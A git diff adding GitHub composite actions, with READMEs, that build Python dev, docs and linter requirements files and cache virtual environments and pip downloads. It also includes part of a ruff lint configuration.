+++ b/.github/actions/python_requirements/create_dev_requirements_file/action.yml
@@ -0,0 +1,28 @@
+name: Composite action create Python dev requirements file
+description: Composite action to create Python dev requirements file
+inputs:
+  install_from:
+    description: Directory that must be used to install the packages
+    required: false
+    default: .
+  project_dev_requirements_file:
+    description: An additional project dev requirements file
+    required: false
+  use_coverage:
+    description: Use coverage.py
+    required: false
+
+runs:
+  using: "composite"
+  steps:
+    - name: Create requirements-dev.txt
+      run: |
+        echo > requirements-dev.txt
+        if [[ '${{ inputs.use_coverage }}' != 'false' ]]; then
+          echo "coverage>=7.3.2" >> requirements-dev.txt
+        fi
+        if [[ -z '${{ inputs.project_dev_requirements_file }}' ]];then
+          cat $(echo ${{ inputs.project_dev_requirements_file }}) >> requirements-dev.txt
+        fi
+      shell: bash
+      working-directory: ${{ inputs.install_from }}
\ No newline at end of file
diff --git a/.github/actions/python_requirements/create_docs_requirements_file/README.md b/.github/actions/python_requirements/create_docs_requirements_file/README.md
new file mode 100644
index 00000000..913192f8
--- /dev/null
+++ b/.github/actions/python_requirements/create_docs_requirements_file/README.md
@@ -0,0 +1,12 @@
+# Composite action create Python docs requirements file
+
+This action creates the `requirements-docs.txt` file. This is a Python requirements file that will contain all **dependencies required to build the documentation**.
+
+## Documentation
+
+### Inputs
+
+* **install_from** - Optional - The path used as working directory when creating the `requirements-docs.txt` file. It defaults to the current directory (i.e. `.`).
+* **project_docs_requirements_file** - Optional - The path of a project `requirements-docs.txt`. This was designed in case requirements to build documentation other than rstcheck, sphinx, sphinx_rtd_theme, sphinxcontrib-spelling and sphinxcontrib-django2 are required. If specified, the dependencies in the project `requirements-docs.txt` will be appended in the newly created `requirements-docs.txt`. **Be careful: if a relative path is used this will depend on *install_from*.** Defaults to empty strings, and hence **no custom `requirements-docs.txt`**.
+* **django_settings_module** - Optional - Path to the Django settings file. It's used to make GitHub action aware of Django presence. In this case, `sphinxcontrib-django2` is also added to the newly created requirement file. **Be careful: if a relative path is used this will depend on *install_from*.** Defaults to empty strings, and hence **no Django settings file**.
+* **check_docs_directory** - Optional - Path that will be used by rstcheck to check documentation. **Be careful: if a relative path is used this will depend on *install_from*.** Defaults to empty strings, and hence **documentation won't be checked**.
diff --git a/.github/actions/python_requirements/create_docs_requirements_file/action.yml b/.github/actions/python_requirements/create_docs_requirements_file/action.yml
new file mode 100644
index 00000000..fb674f80
--- /dev/null
+++ b/.github/actions/python_requirements/create_docs_requirements_file/action.yml
@@ -0,0 +1,37 @@
+name: Composite action create Python docs requirements file
+description: Composite action to create Python docs requirements file
+inputs:
+  install_from:
+    description: Directory that must be used to install the packages
+    required: false
+    default: .
+  project_docs_requirements_file:
+    description: An additional project docs requirements file
+    required: false
+  django_settings_module:
+    description: Path to the django settings file
+    required: false
+  check_docs_directory:
+    description: Check docs using rstcheck inside this directory
+    required: false
+
+runs:
+  using: "composite"
+  steps:
+    - name: Create requirements-docs.txt
+      run: |
+        echo > requirements-docs.txt
+        if [[ -n '${{ inputs.check_docs_directory }}' ]]; then
+          echo "rstcheck[sphinx]" >> requirements-docs.txt 
+          echo "sphinx==7.2.6" >> requirements-docs.txt
+          echo "sphinx_rtd_theme==1.3.0" >> requirements-docs.txt
+          echo "sphinxcontrib-spelling==8.0.0" >> requirements-docs.txt
+          if [[ -n '${{ inputs.django_settings_module }}' ]]; then
+            echo "sphinxcontrib-django2==1.9" >> requirements-docs.txt
+          fi
+          if [[ -z '${{ inputs.project_docs_requirements_file }}' ]];then
+            cat $(echo ${{ inputs.project_docs_requirements_file }}) >> requirements-docs.txt
+          fi
+        fi
+      shell: bash
+      working-directory: ${{ inputs.install_from }}
\ No newline at end of file
diff --git a/.github/actions/python_requirements/create_linter_requirements_file/README.md b/.github/actions/python_requirements/create_linter_requirements_file/README.md
new file mode 100644
index 00000000..fafbb9b1
--- /dev/null
+++ b/.github/actions/python_requirements/create_linter_requirements_file/README.md
@@ -0,0 +1,32 @@
+# Composite action create Python linter requirements file
+
+This action creates the `requirements-linters.txt` file which will contain all **linter dependencies** required by the CI.
+The user can then choose which linters will be run, and hence written to the `requirements-linters.txt`, by the CI by setting some flags to true like *use_black*.
+
+As of today only the following linters are supported:
+
+* `autoflake`
+* `bandit`
+* `black`
+* `flake8`
+* `flake8-django`
+* `isort`
+* `pylint`
+* `pylint-django`
+* `ruff`
+
+## Documentation
+
+### Inputs
+
+* **install_from** - Optional - The path used as working directory when creating the `requirements-linters.txt` file. It defaults to the current directory (i.e. `.`).
+* `project_linter_requirements_file` - Optional - The path of a project `requirements-linters.txt`. This was designed in case requirements for linters other than `autoflake`, `bandit`, `black`, `flake8`, `flake8-django`, `isort`, `pylint` and `pylint-django` are required. If specified, the dependencies in the project `requirements-linters.txt` will be appended in the newly created `requirements-linters.txt`. **Be careful: if a relative path is used this will depend on *install_from*.** Defaults to empty strings, and hence **no custom `requirements-linters.txt`**.
+* **django_settings_module** - Optional - Path to the Django settings file. It's used to make GitHub action aware of Django presence. In the case of a Django project, `flake8-django` and `pylint-django`, may be used and hence they will be added to the newly created requirements file. **Be careful: if a relative path is used this will depend on *install_from*.** Defaults to empty strings, and hence **no Django settings file**.
+* **use_autoflake** - Optional - Flag to state whether to use or not `autoflake` linter. It defaults to false.
+* **use_bandit** - Optional - Flag to state whether to use or not `bandit` linter. It defaults to false.
+* **use_black** - Optional - Flag to state whether to use `black` formatter. It defaults to false.
+* **use_flake8** - Optional - Flag to state whether to use or not `flake8` linter. It defaults to false.
+* **use_isort** - Optional - Flag to state whether to use or not `isort` formatter. It defaults to false.
+* **use_pylint** - Optional - Flag to state whether to use or not `pylint` linter. It defaults to false.
+* **use_ruff_formatter** - Optional - Flag to state whether to use `ruff` **formatter** (so without the linting). It defaults to false.
+* **use_ruff_linter** - Optional - Flag to state whether to use `ruff` **linter** (so without the formatting). It defaults to false.
diff --git a/.github/actions/python_requirements/create_linter_requirements_file/action.yml b/.github/actions/python_requirements/create_linter_requirements_file/action.yml
new file mode 100644
index 00000000..b7ac0923
--- /dev/null
+++ b/.github/actions/python_requirements/create_linter_requirements_file/action.yml
@@ -0,0 +1,103 @@
+name: Composite action create Python linter requirements file
+description: Composite action to create Python linter requirements file
+inputs:
+  install_from:
+    description: Directory that must be used to install the packages
+    required: false
+    default: .
+  project_linter_requirements_file:
+    description: An additional project linter requirements file
+    required: false
+  django_settings_module:
+    description: Path to the django settings file
+    required: false
+  use_autoflake:
+    description: Use autoflake linter
+    required: false
+  use_bandit:
+    description: Use bandit linter
+    required: false
+  use_black:
+    description: Use black formatter
+    required: false
+  use_flake8:
+    description: Use flake8 linter
+    required: false
+  use_isort:
+    description: Use isort formatter
+    required: false
+  use_pylint:
+    description: Use pylint linter
+    required: false
+  use_ruff_formatter:
+    description: Use ruff formatter
+    required: false
+  use_ruff_linter:
+    description: Use ruff linter
+    required: false
+
+
+runs:
+  using: "composite"
+  steps:
+    - name: Create requirements-linters.txt
+      run: |
+        function check_linter_dependency_and_append_to_file {
+          #
+          # Function to check whether a specific linter is in the requirements file
+          # If it can be found inside the requirements, said linter dependency will be appended to a newly created requirements-linter.txt file.
+          # If the linter is not found inside the requirements file an error will be raised.
+          #
+          # 1st parameter: Name of the linter.
+          # 2nd parameter: Path of the requirements file.
+          #
+          if [[ -z $(grep -P "^$1[^a-zA-Z0-9_-].*" "$2") ]]; then
+            echo "::error::$1 dependency not found in $2 file!"
+            exit 1
+          else
+            echo "$1 dependency found in $2!"
+            echo "$(grep -P ^$1[^a-zA-Z0-9_-].* $2)" >> requirements-linters.txt
+          fi
+        }
+        CI_REQUIREMENTS_LINTERS="${GITHUB_WORKSPACE}/.github/configurations/python_linters/requirements-linters.txt"
+        echo > requirements-linters.txt
+
+        if [[ '${{ inputs.use_black }}' != 'false' ]]; then
+          check_linter_dependency_and_append_to_file "black" "$CI_REQUIREMENTS_LINTERS"
+        fi
+
+        if [[ '${{ inputs.use_isort }}' != 'false' ]]; then
+          check_linter_dependency_and_append_to_file "isort" "$CI_REQUIREMENTS_LINTERS"
+        fi
+
+        if [[ '${{ inputs.use_flake8 }}' != 'false' ]]; then
+          check_linter_dependency_and_append_to_file "flake8" "$CI_REQUIREMENTS_LINTERS"
+          if [[ -n '${{ inputs.django_settings_module }}' ]]; then
+            check_linter_dependency_and_append_to_file "flake8-django" "$CI_REQUIREMENTS_LINTERS"
+          fi
+        fi
+
+        if [[ '${{ inputs.use_pylint }}' != 'false' ]]; then
+          check_linter_dependency_and_append_to_file "pylint" "$CI_REQUIREMENTS_LINTERS"
+          if [[ -n '${{ inputs.django_settings_module }}' ]]; then
+            check_linter_dependency_and_append_to_file "pylint-django" "$CI_REQUIREMENTS_LINTERS"
+          fi
+        fi
+
+        if [[ '${{ inputs.use_bandit }}' != 'false' ]]; then
+          check_linter_dependency_and_append_to_file "bandit" "$CI_REQUIREMENTS_LINTERS"
+        fi
+
+        if [[ '${{ inputs.use_autoflake }}' != 'false' ]]; then
+          check_linter_dependency_and_append_to_file "autoflake" "$CI_REQUIREMENTS_LINTERS"
+        fi
+
+        if [[ '${{ inputs.use_ruff_formatter }}' != 'false' || '${{ inputs.use_ruff_linter }}' != 'false' ]]; then
+          check_linter_dependency_and_append_to_file "ruff" "$CI_REQUIREMENTS_LINTERS"
+        fi
+
+        if [[ -z '${{ inputs.project_linter_requirements_file }}' ]]; then
+          cat $(echo ${{ inputs.project_linter_requirements_file }}) >> requirements-linters.txt
+        fi
+      shell: bash
+      working-directory: ${{ inputs.install_from }}
\ No newline at end of file
diff --git a/.github/actions/python_requirements/create_virtualenv/README.md b/.github/actions/python_requirements/create_virtualenv/README.md
new file mode 100644
index 00000000..8f3361a6
--- /dev/null
+++ b/.github/actions/python_requirements/create_virtualenv/README.md
@@ -0,0 +1,20 @@
+# Composite action create Python virtual environment
+
+This GitHub action creates a Python virtual environment using Python's `venv` module.
+
+When the *activate_only* flag set is to true, the virtual environment at *virtualenv_path* will only be activated—**no creation will take place**.
+
+NOTE:
+
+To activate a Python virtual environment, the `activate` script is often used.
+However, in a GitHub Action environment, this is not enough because environment variables are "lost" at the end of the Action. For this we need to do two things:
+
+1. Append the `VIRTUAL_ENV` environment variable to the `GITHUB_ENV` environment file. The [`GITHUB_ENV`](https://docs.github.com/en/enterprise-cloud@latest/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions#setting-an-environment-variable) files makes environment variables available to any subsequent steps in a workflow job. Finally, it's important to note that `VIRTUAL_ENV` variable is created by the `activate` script and contains the path to the virtual environment.
+2. Prepend the virtual environment's `bin` path to the system PATH. To allow also any subsequent steps in a workflow to be able to use it, [`GITHUB_PATH`](https://docs.github.com/en/enterprise-cloud@latest/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions#adding-a-system-path) is employed.
+
+## Documentation
+
+### Inputs
+
+* **virtualenv_path** - Optional - The path where the virtual environment will be created. It defaults to `.venv`.
+* **activate_only** - Optional - Flag that states whether to only activate the virtual environment. If false, a new virtual environment will be created before being activated. It defaults to false.
\ No newline at end of file
diff --git a/.github/actions/python_requirements/create_virtualenv/action.yml b/.github/actions/python_requirements/create_virtualenv/action.yml
new file mode 100644
index 00000000..02dcb936
--- /dev/null
+++ b/.github/actions/python_requirements/create_virtualenv/action.yml
@@ -0,0 +1,28 @@
+name: Composite action create Python virtual environment
+description: Composite action create Python virtual environment
+inputs:
+  virtualenv_path:
+    description: Python's virtual environment path.
+    required: false
+    default: ".venv"
+  activate_only:
+    description: Whether to create the virtual environment or only activate it.
+    required: false
+    default: false
+
+runs:
+  using: "composite"
+  steps:
+    - name: Python's virtualenv creation
+      if: inputs.activate_only != 'true'
+      run: python -m venv ${{ inputs.virtualenv_path }}
+      shell: bash
+    - name: Activate newly created virtualenv
+      id: activate_newly_created_virtualenv
+      run: |
+        source ${{ inputs.virtualenv_path }}/bin/activate
+        echo "VIRTUAL_ENV=$VIRTUAL_ENV" >> $GITHUB_ENV
+        echo "::debug::Virtual environment path is $VIRTUAL_ENV"
+        echo "$VIRTUAL_ENV/bin" >> $GITHUB_PATH
+        echo "::debug::PATH environment variable state after $VIRTUAL_ENV/bin path being added to it: $GITHUB_PATH"
+      shell: bash
diff --git a/.github/actions/python_requirements/restore_pip_cache/README.md b/.github/actions/python_requirements/restore_pip_cache/README.md
new file mode 100644
index 00000000..92a2a2fd
--- /dev/null
+++ b/.github/actions/python_requirements/restore_pip_cache/README.md
@@ -0,0 +1,41 @@
+# Composite action restore pip cache
+
+This action restores the pip download cache from GitHub's cache.
+
+The action is composed of four steps:
+
+1. **Generate random UUID** - This step computes a random UUID, using the shell command `uuidgen`, which will be part of the cache key. Since pip cache will always be restored when a virtual environment is not found on GitHub's cache, a random UUID is required to generate a cache miss.
+2. **Get pip cache directory** - This step retrieves the path to the pip cache. If *custom_pip_cache_path* is not an empty string, it will be used as pip cache path. Otherwise, the pip cache will be computed using `pip cache dir`.
+3. **Restore pip cache** - This step performs the heavy lifting of the restoring. Using GitHub's [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md) action, the cache is restored using a **partial match**. This is performed by setting the following [inputs](https://github.com/actions/cache/tree/main/restore#inputs):
+   1. **key** - an explicit key for a cache entry - will be set to a random UUID which will always trigger a cache miss.
+   2. **path** - a list of files, directories, paths to restore - will be set to the pip download cache path.
+   3. **restore-keys** - an ordered list of prefix-matched keys to use for restoring stale cache if no cache hit occurred for key - will be set to `<git_reference>-pip-cache-` to restore the most recent pip cache for the chosen git reference.
+4. **Explain cache output** - This step analyze the results of the [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md) action and sets *real_cache_hit* environment variable to true if there was a match, false otherwise. This is necessary because, in the case of a **partial match**, the *cache-hit*, output of [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md), will be false. Instead, we use the `cache-matched-key`, another output of [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md), which contains a reference for both **partial** and full matches, but will be empty in the case of a cache miss.
+
+NOTE:
+
+This action, despite seeming a bit unusual, is correct because GitHub does not allow cache updates or overwrites.
+
+Let's think about a real-world scenario:
+
+A user updates the requirements file.
+
+In this case our query to GitHub's cache for the previously cached virtual environment will **always** miss. This happens because changing the requirements file results in a new SHA256 hash, so the cache key changes.
+
+Thus, we aim to restore the pip cache to at least *mitigate* the impact of the changes in the requirements. Specifically, we want to save time by avoiding the download of packages that did not change.
+
+Next, we try to query the GitHub's cache for the previously cached pip cache. However, there are a few issues:
+
+1. We cannot use the SHA256 of the requirements file because it has changed, leading to cache misses.
+2. We cannot create a cache key without a random component because, as said earlier, GitHub does not allow overwriting or updating of a cache item. For example, a cache key like `develop-pip-cache-` would generate an error when attempting to save a new cache if one already exists with the same name.
+
+## Documentation
+
+### Inputs
+
+* **custom_pip_cache** - Optional - Path to the pip cache. It can be used for setting a custom pip cache path. It defaults to an empty string. In this case, the pip cache path will be computed using `pip cache dir`. More information regarding the previous command is available [here](https://pip.pypa.io/en/stable/cli/pip_cache/#description)
+* **git_reference** - Optional - A git reference that will be used to build the cache key. It defaults to `github.ref_name` which is a context variable containing **the short ref name of the branch or tag that triggered the workflow run**. For example it may be `feature-branch-1` or, for pull requests, `<pr_number>/merge`.
+
+### Outputs
+
+* **cache-hit** - A boolean value which states whether pip cache was found on GitHub's cache or not.
diff --git a/.github/actions/python_requirements/restore_pip_cache/action.yml b/.github/actions/python_requirements/restore_pip_cache/action.yml
new file mode 100644
index 00000000..e4568f79
--- /dev/null
+++ b/.github/actions/python_requirements/restore_pip_cache/action.yml
@@ -0,0 +1,53 @@
+name: Composite action restore pip cache
+description: Composite action to restore pip cache
+inputs:
+  custom_pip_cache_path:
+    description: Path to pip cache.
+    required: false
+  git_reference:
+    description: A git reference (name of the branch, reference to the PR) that will be used to build the cache key.
+    required: false
+    default: ${{ github.ref_name }}
+
+outputs:
+  cache-hit:
+    description: Whether pip cache was found in the cache or not.
+    value: ${{ steps.explain_cache_output.outputs.real_cache_hit }}
+
+runs:
+  using: "composite"
+  steps:
+    - name: Generate random UUID
+      id: generate_random_uuid
+      run: |
+        random_uuid=$(uuidgen -r)
+        echo "::debug::Random uuid generated is $random_uuid. Should only cause a cache-miss"
+        echo "computed_uuid=$random_uuid" >> $GITHUB_OUTPUT
+      shell: bash
+    - name: Get pip cache directory
+      id: get_pip_cache_directory
+      run: |
+        if [[ -z '${{ inputs.custom_pip_cache_path }}' ]]; then
+          echo "pip_cache_path=$(pip cache dir)" >> $GITHUB_OUTPUT
+        else
+          echo "pip_cache_path=${{ inputs.custom_pip_cache_path }}" >> $GITHUB_OUTPUT
+        fi
+        echo "::debug::Pip cache path $pip_cache_path"
+      shell: bash
+    - name: Restore pip cache
+      id: restore_pip_cache
+      uses: actions/cache/restore@v4
+      with:
+        key: ${{ steps.generate_random_uuid.outputs.computed_uuid }}
+        path: ${{ steps.get_pip_cache_directory.outputs.pip_cache_path }}
+        restore-keys: ${{ inputs.git_reference }}-pip-cache-
+    - name: Explain cache output
+      id: explain_cache_output
+      run: |
+        echo "::debug::Restore action for pip's cache returned cache-hit: ${{ steps.restore_pip_cache.outputs.cache-hit }} with cache-matched-key: ${{ steps.restore_pip_cache.outputs.cache-matched-key }}"
+        if [[ -z '${{ steps.restore_pip_cache.outputs.cache-matched-key }}' ]]; then
+          echo "real_cache_hit=false" >> $GITHUB_OUTPUT
+        else
+          echo "real_cache_hit=true" >> $GITHUB_OUTPUT
+        fi
+      shell: bash
\ No newline at end of file
diff --git a/.github/actions/python_requirements/restore_virtualenv/README.md b/.github/actions/python_requirements/restore_virtualenv/README.md
new file mode 100644
index 00000000..e40a3c1c
--- /dev/null
+++ b/.github/actions/python_requirements/restore_virtualenv/README.md
@@ -0,0 +1,30 @@
+# Composite action restore Python virtual environment
+
+This action restores a Python virtual environment from GitHub's cache.
+
+Combined with [**save_virtualenv**](../save_virtualenv/README.md), **it helps save time by avoiding the installation of Python requirements**.
+
+The action is composed of three steps:
+
+1. **Compute requirements files SHA256 hash** - This step uses [**misc/compute_files_hash**](../../misc/compute_files_hash/README.md) action to compute a single SHA256 hash of the files described by the *requirements_paths*. The computed SHA256 hash will be part of the cache key.
+2. **Restore virtual environment** - This step does the heavy lifting of restoring the virtual environment from GitHub's cache. It uses the GitHub's [**cache/restore**](https://github.com/actions/cache/blob/main/restore/README.md) action with the following parameters:
+   * **path** - A list of files, directories, or paths to restore - set to the virtual environment path input variable *virtual_environment_path*.
+   * **key** - An explicit key for a cache entry - set to the combination of three strings:
+      * *git_reference*, provided as an input to the action.
+      * A static part, `-venv-`
+      * The previously computed SHA256 hash of the requirements files.
+3. **Activate restored virtual environment** - If the Python virtual environment was found in the GitHub's cache, it needs to be activated. This is performed using [**python_requirements/create_virtualenv**](../create_virtualenv/README.md) action with the following parameters:
+   * **virtualenv_path** - set to the Python virtual environment path.
+   * **activate_only** - set to true because it doesn't need to be created.
+
+## Documentation
+
+### Inputs
+
+* **virtual_environment_path** - Optional - Path where the virtual environment is located. It may be used to provide a custom path for the virtual environment. It defaults to `.venv`.
+* **requirements_paths** - Required - A space separated list of requirements file paths. They will be used to compute a SHA256 hash used in the cache key. It defaults to an empty string.
+* **git_reference** - Optional - A git reference that will be used to build the cache key. It defaults to `github.ref_name` which is a context variable containing **the short ref name of the branch or tag that triggered the workflow run**. For example it may be `feature-branch-1` or, for pull requests, `<pr_number>/merge`.
+
+### Outputs
+
+* **cache-hit** - A boolean value which is true when virtual environment is found in the GitHub's cache, false otherwise.
diff --git a/.github/actions/python_requirements/restore_virtualenv/action.yml b/.github/actions/python_requirements/restore_virtualenv/action.yml
new file mode 100644
index 00000000..cd76c98e
--- /dev/null
+++ b/.github/actions/python_requirements/restore_virtualenv/action.yml
@@ -0,0 +1,43 @@
+name: Composite action restore Python virtual environment
+description: Composite action to restore Python virtual environment
+inputs:
+  virtual_environment_path:
+    description: Path to where virtual environment will be restored.
+    required: false
+    default: ".venv"
+  requirements_paths:
+    description: Space separeted list of requirement files. They will be used to compute the hash for the cache key.
+    required: true
+  git_reference:
+    description: A git reference (name of the branch, reference to the PR) that will be used to build the cache key.
+    required: false
+    default: ${{ github.ref_name }}
+
+outputs:
+  cache-hit:
+    description: Whether virtual environment was found in the cache or not.
+    value: ${{ steps.restore_virtual_environment.outputs.cache-hit }}
+
+runs:
+  using: "composite"
+  steps:
+    - name: Compute requirements files SHA256 hash
+      id: compute_requirements_files_sha256_hash
+      uses: ./.github/actions/misc/compute_files_hash
+      with:
+        file_paths: ${{ inputs.requirements_paths }}
+
+    - name: Restore virtual environment
+      id: restore_virtual_environment
+      uses: actions/cache/restore@v4
+      with:
+        path: ${{ inputs.virtual_environment_path }}
+        key: ${{ inputs.git_reference }}-venv-${{ steps.compute_requirements_files_sha256_hash.outputs.computed_hash }}
+    
+    - name: Activate restored virtual environment
+      if: >
+        steps.restore_virtual_environment.outputs.cache-hit == 'true'
+      uses: ./.github/actions/python_requirements/create_virtualenv
+      with:
+        virtualenv_path: ${{ inputs.virtual_environment_path }}
+        activate_only: true
\ No newline at end of file
diff --git a/.github/actions/python_requirements/save_pip_cache/README.md b/.github/actions/python_requirements/save_pip_cache/README.md
new file mode 100644
index 00000000..e3950a0c
--- /dev/null
+++ b/.github/actions/python_requirements/save_pip_cache/README.md
@@ -0,0 +1,22 @@
+# Composite action save pip cache
+
+This action saves the pip download cache.
+
+Every time a user runs `pip install <package_name>`, pip downloads the package and all its dependencies.The packages are saved in a directory which, by default, is located at `~/.cache/pip`.
+Saving this cache in GitHub's cache allows us to save time when installing those packages. As a matter of fact, before installing packages, pip's cache can be restored using [**restore_pip_cache**](../restore_pip_cache/README.md) action.
+
+The action is composed of three steps:
+
+1. **Generate random UUID** - This step computes a random UUID, using shell command `uuidgen`, which will be part of the cache key. The uniqueness of the UUID ensures that there will be no collisions between cache keys, which is crucial because **GitHub won't allow the creation of two caches with the same key** (cache update/overwrite **is not supported**).
+2. **Get pip cache directory** - This step retrieves the path to the pip cache. If *custom_pip_cache_path* is not an empty string, it will be used as pip cache path. Otherwise, the pip cache will be computed using `pip cache dir`.
+3. **Save pip cache** - This step performs the heavy lifting of the caching. Using GitHub's [**cache/save**](https://github.com/actions/cache/blob/main/save/README.md) action, the cache is saved with a key composed of:
+   1. The git reference input, *git_reference*
+   2. A static part, `pip-cache`
+   3. The previously computed UUID
+
+## Documentation
+
+### Inputs
+
+* **custom_pip_cache** - Optional - Path to the pip cache. It can be used for setting a custom pip cache path. It defaults to an empty string. In this case, the pip cache path will be computed using `pip cache dir`. More information regarding the previous command is available [here](https://pip.pypa.io/en/stable/cli/pip_cache/#description)
+* **git_reference** - Optional - A git reference that will be used to build the cache key. It defaults to `github.ref_name` which is a context variable containing **the short ref name of the branch or tag that triggered the workflow run**. For example it may be `feature-branch-1` or, for pull requests, `<pr_number>/merge`.
diff --git a/.github/actions/python_requirements/save_pip_cache/action.yml b/.github/actions/python_requirements/save_pip_cache/action.yml
new file mode 100644
index 00000000..d98e398d
--- /dev/null
+++ b/.github/actions/python_requirements/save_pip_cache/action.yml
@@ -0,0 +1,36 @@
+name: Composite action save pip cache
+description: Composite action to save pip cache
+inputs:
+  custom_pip_cache_path:
+    description: Path to the pip cache.
+    required: false
+  git_reference:
+    description: A git reference (name of the branch, reference to the PR) that will be used to build the cache key.
+    required: false
+    default: ${{ github.ref_name }}
+
+runs:
+  using: "composite"
+  steps:
+    - name: Generate random UUID
+      id: generate_random_uuid
+      run: |
+        random_uuid=$(uuidgen -r)
+        echo "::debug::Random uuid generated is $random_uuid"
+        echo "computed_uuid=$random_uuid" >> $GITHUB_OUTPUT
+      shell: bash
+    - name: Get pip cache directory
+      id: get_pip_cache_directory
+      run: |
+        if [[ -z '${{ inputs.custom_pip_cache_path }}' ]]; then
+          echo "pip_cache_path=$(pip cache dir)" >> $GITHUB_OUTPUT
+        else
+          echo "pip_cache_path=${{ inputs.custom_pip_cache_path }}" >> $GITHUB_OUTPUT
+        fi
+        echo "::debug::The pip cache path is $pip_cache_path"
+      shell: bash
+    - name: Save pip cache
+      uses: actions/cache/save@v4
+      with:
+        path: ${{ steps.get_pip_cache_directory.outputs.pip_cache_path }}
+        key: ${{ inputs.git_reference }}-pip-cache-${{ steps.generate_random_uuid.outputs.computed_uuid }}
\ No newline at end of file
diff --git a/.github/actions/python_requirements/save_virtualenv/README.md b/.github/actions/python_requirements/save_virtualenv/README.md
new file mode 100644
index 00000000..19d9ab5f
--- /dev/null
+++ b/.github/actions/python_requirements/save_virtualenv/README.md
@@ -0,0 +1,23 @@
+# Composite action save Python virtual environment
+
+This action saves a Python virtual environment to GitHub's cache.
+
+Combined with [**restore_virtualenv**](../restore_virtualenv/README.md), **it helps save time by avoiding the installation of Python requirements**.
+
+The action is composed of two steps:
+
+1. **Compute requirements files SHA256 hash** - This step uses [**misc/compute_files_hash**](../../misc/compute_files_hash/README.md) to compute a single SHA256 hash of the files described by the *requirements_paths*. The computed SHA256 hash will be part of the cache key.
+2. **Cache virtual environment** - This step does the heavy lifting of saving the virtual environment to GitHub's cache. It uses the GitHub's [**cache/save**](https://github.com/actions/cache/blob/main/save/README.md) action with the following parameters:
+   1. **path** - A list of files, directories, or paths to cache - set to the virtual environment path input variable *virtual_environment_path*.
+   2. **key** - An explicit key for a cache entry - set to the combination of three strings:
+      1. *git_reference*, provided as an input to the action.
+      2. A static part, `-venv-`
+      3. The previously computed SHA256 hash of the requirements files.
+
+## Documentation
+
+### Inputs
+
+* **virtual_environment_path** - Optional - Path where the virtual environment is located. It may be used to provide a custom path for the virtual environment. It defaults to `.venv`.
+* **requirements_paths** - Required - A space separated list of requirements file paths. They will be used to compute a SHA256 hash used in the cache key.
+* **git_reference** - Optional - A git reference that will be used to build the cache key. It defaults to `github.ref_name` which is a context variable containing **the short ref name of the branch or tag that triggered the workflow run**. For example it may be `feature-branch-1` or, for pull requests, `<pr_number>/merge`.
diff --git a/.github/actions/python_requirements/save_virtualenv/action.yml b/.github/actions/python_requirements/save_virtualenv/action.yml
new file mode 100644
index 00000000..6c6c66c1
--- /dev/null
+++ b/.github/actions/python_requirements/save_virtualenv/action.yml
@@ -0,0 +1,29 @@
+name: Composite action save Python virtual environment
+description: Composite action to save Python virtual environment
+inputs:
+  virtual_environment_path:
+    description: Path to the virtual environment.
+    required: false
+    default: ".venv"
+  requirements_paths:
+    description: Space separeted list of requirements files. They will be used to compute the hash for the cache key.
+    required: true
+  git_reference:
+    description: A git reference (name of the branch, reference to the PR) that will be used to build the cache key.
+    required: false
+    default: ${{ github.ref_name }}
+
+runs:
+  using: "composite"
+  steps:
+    - name: Compute requirements files SHA256 hash
+      id: compute_requirements_files_sha256_hash
+      uses: ./.github/actions/misc/compute_files_hash
+      with:
+        file_paths: ${{ inputs.requirements_paths }}
+
+    - name: Cache virtual environment
+      uses: actions/cache/save@v4
+      with:
+        path: ${{ inputs.virtual_environment_path }}
+        key: ${{ inputs.git_reference }}-venv-${{ steps.compute_requirements_files_sha256_hash.outputs.computed_hash }}
\ No newline at end of file
diff --git a/.github/actions/services/action.yml b/.github/actions/services/action.yml
index b814a033..95cf2131 100644
--- a/.github/actions/services/action.yml
+++ b/.github/actions/services/action.yml
@@ -104,6 +104,7 @@ runs:
             echo "    environment:" >> elastic_search.yml
             echo "      ES_JAVA_OPTS: -Xms1g -Xmx1g" >> elastic_search.yml
             echo "      discovery.type: single-node" >> elastic_search.yml
+            echo "      xpack.security.enabled: 'false'" >> elastic_search.yml
             echo "    ports:" >> elastic_search.yml
             echo "      - ${{ inputs.elasticsearch_port }}:9200" >> elastic_search.yml
             echo "    healthcheck:" >> elastic_search.yml
diff --git a/.github/configurations/python_linters/.ruff.toml b/.github/configurations/python_linters/.ruff.toml
new file mode 100644
index 00000000..fb6f0ef7
--- /dev/null
+++ b/.github/configurations/python_linters/.ruff.toml
@@ -0,0 +1,90 @@
+# Top level settings
+## Reference: https://docs.astral.sh/ruff/settings/#top-level
+
+extend-exclude = [
+    ".github",
+    ".idea",
+    ".vscode",
+    "**/migrations/*"
+]
+
+include = ["*.py"]
+
+indent-width = 4
+
+line-length = 160
+
+output-format = "full"
+
+respect-gitignore = false
+
+show-fixes = true
+
+target-version = "py312"
+
+# Format settings level
+## Reference: https://docs.astral.sh/ruff/settings/#format
+[format]
+
+docstring-code-format = true
+
+indent-style = "space"
+
+line-ending = "native"
+
+quote-style = "double"
+
+skip-magic-trailing-comma = false
+
+[lint]
+
+select = [
+    "E",   # pycodestyle errors - https://docs.astral.sh/ruff/rules/#error-e
+    "W",   # pycodestyle warnings - https://docs.astral.sh/ruff/rules/#warning-w
+    "F",   # pyflakes - https://docs.astral.sh/ruff/rules/#pyflakes-f
+    "I",   # isort - https://docs.astral.sh/ruff/rules/#isort-i
+    "N",   # pep8-naming - https://docs.astral.sh/ruff/rules/#pep8-naming-n
+    "UP",  # pyupgrade - https://docs.astral.sh/ruff/rules/#pyupgrade-up
+    "B",   # flake8-bugbear - https://docs.astral.sh/ruff/rules/#flake8-bugbear-b
+    "C4",  # flake8-comprehensions - https://docs.astral.sh/ruff/rules/#flake8-comprehensions-c4
+    "DJ",  # flake8-django - https://docs.astral.sh/ruff/rules/#flake8-django-dj
+]
+
+ignore = [
+    # F403: Allow wildcard imports in __init__.py files
+    "F403",
+    # B006/B008: Allow mutable defaults and function calls in defaults for test helpers
+    "B006",
+    "B008",
+    # B017: Allow blind exception in tests  
+    "B017",
+    # B023: Allow loop variable in lambda (functional style)
+    "B023",
+    # B904: Allow raise without from (intentional re-raise)
+    "B904",
+    # C401/C408: Allow dict() and generator patterns (style preference)
+    "C401",
+    "C408",
+    # DJ001: Allow null=True on CharField (intentional for optional fields)
+    "DJ001",
